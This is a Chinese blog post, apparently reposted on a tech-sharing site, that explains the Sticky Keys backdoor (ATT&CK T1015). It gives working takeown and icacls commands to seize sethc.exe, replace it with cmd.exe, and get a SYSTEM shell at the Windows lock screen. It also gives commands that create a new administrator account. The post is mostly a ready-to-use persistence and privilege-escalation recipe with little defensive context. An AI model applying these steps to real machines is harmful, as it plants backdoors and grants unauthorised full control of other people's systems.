标签：exe Features Windows T1015 Accessibility Administrators FULL 粘滞 sethc

Windows为特殊人士设计了轻松访问功能，比如放大镜、讲述人、粘滞键等等。利用轻松访问功能里的某些特性，可以完成提权和驻留。

一、粘滞键 Sticky Keys

粘滞键是为了方便某些人不方便同时按键的电脑使用者使用windows 快捷键，启动粘滞键后，按Ctrl+Alt+Del就可以每次按一个键。

启动粘滞键的方式是连按5次shift键，即使是锁屏的情况下也可以；而且，在锁屏状态下是以system权限启动sethc.exe的。

  

 

1. 替换sethc.exe

将sethc.exe替换成cmd.exe，就可以实现提权和驻留，但sethc.exe的owner是TrustInstaller，Administrators组也没有写权限。

 

因此先使用takeown将owner改为当前用户，这样就有修改权限了, 再授予Administrators组Full Conrol权限。

C:\Windows\system32>takeown.exe /F c:\Windows\System32\sethc.exe

SUCCESS: The file (or folder): "c:\Windows\System32\sethc.exe" now owned by user "RING\win10".

C:\Windows\system32>icacls c:\Windows\System32\sethc.exe /grant Administrators:F
processed file: c:\Windows\System32\sethc.exe
Successfully processed 1 files; Failed processing 0 files

 

此时再copy就没有问题了

C:\Windows\system32>copy cmd.exe sethc.exe /y
        1 file(s) copied.

 

2. 使用后门

连按5次shift启动cmd.exe, 锁屏状态下是以system权限启动的 !!!

 

能做的操作有很多，比如添加新用户

net user test Password123 /add
net localgroup administrators test /add

 

不过网络攻击中怎么满足锁屏状态下按5次shift键呢??? 似乎可用性不是很强

3. 命令备注:

takeown /F X:\FULL_PATH_TO_FOLDER
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F

# 作用到子文件及子文件夹
takeown /F X:\FULL_PATH_TO_FOLDER /r /d y
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

 

参考：

https://thegeekpage.com/solved-failed-to-enumerate-objects-in-the-container-windows-10-error/

https://www.cnblogs.com/BOHB-yunying/p/11695140.html

 

 

 

 

 

标签：exe,Features,Windows,T1015,Accessibility,Administrators,FULL,粘滞,sethc
来源： https://www.cnblogs.com/ring-lcy/p/12542583.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。